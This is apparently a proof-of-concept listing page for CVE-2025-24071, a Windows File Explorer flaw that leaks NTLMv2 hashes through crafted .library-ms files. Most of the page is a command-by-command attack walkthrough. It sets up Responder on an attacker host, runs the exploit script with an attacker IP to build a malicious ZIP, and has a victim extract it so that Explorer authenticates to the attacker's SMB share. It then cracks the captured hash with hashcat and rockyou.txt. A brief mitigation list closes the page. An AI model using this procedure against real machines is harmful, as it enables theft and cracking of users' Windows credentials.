CVE-2025-24071 PoC — Microsoft Windows File Explorer 信息泄露漏洞

Source

Associated Vulnerability

Description

CVE-2025-24071: NTLMv2 Hash Disclosure via .library-ms File

Readme

# CVE-2025-24071-POC-NTLMHashDisclosure
- Triggers automatic SMB authentication to an attacker-controlled share.
- No interaction required — Windows Explorer initiates this NTLM authentication automatically.
- Results in NTLMv2 hash leakage (information disclosure).
- Affects Windows 10/11 all versions, especially 11 23H2.

## Set Up the Attacker Environment

> sudo apt update && sudo apt install responder -y

Start Responder 

> sudo responder -I eth0

## Run the Exploit Script

Install required Python module
>pip install colorama
>python3 CVE-2025-24071.py -i <attacker_ip> -n testpayload -o ./output --keep

This will generate:
    testpayload.library-ms
    testpayload.zip

## Test on the Victim Machine

Transfer testpayload.zip to the Windows 11 test machine.
Extract the ZIP using Windows File Explorer.
This triggers Windows to try accessing the SMB path, leaking the NTLM hash.

## Capture the Hash
>responder -I etho0

![Image](https://github.com/user-attachments/assets/facabd32-99d1-4c73-860f-5f77b734c3b8)


## Prepare the Hash File

create hash,txt file 
>victim::DOMAIN:1122334455667788:11223344556677889900aabbccddeeff:01010000000000000090d5d00f3

## Choose a Wordlist

most common rockyou.txt

## Run Hashcat

>hashcat -m 5600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt

![Image](https://github.com/user-attachments/assets/9b0a9d7c-793f-4fd0-aa5a-0a2032a85c28)


## Mitigation

- Block outbound SMB (TCP 445) at firewalls.
- Disable automatic authentication to untrusted SMB shares (group policy).
- Monitor for .library-ms file extraction and SMB connections.

File Snapshot

 [4.0K]  /data/pocs/64449e92cd1a22514538fdc859b22d2202aa0e92
├── [4.0K]  POC
│   └── [3.4K]  CVE-2025-24071.py
└── [1.6K]  README.md

1 directory, 2 files

Remarks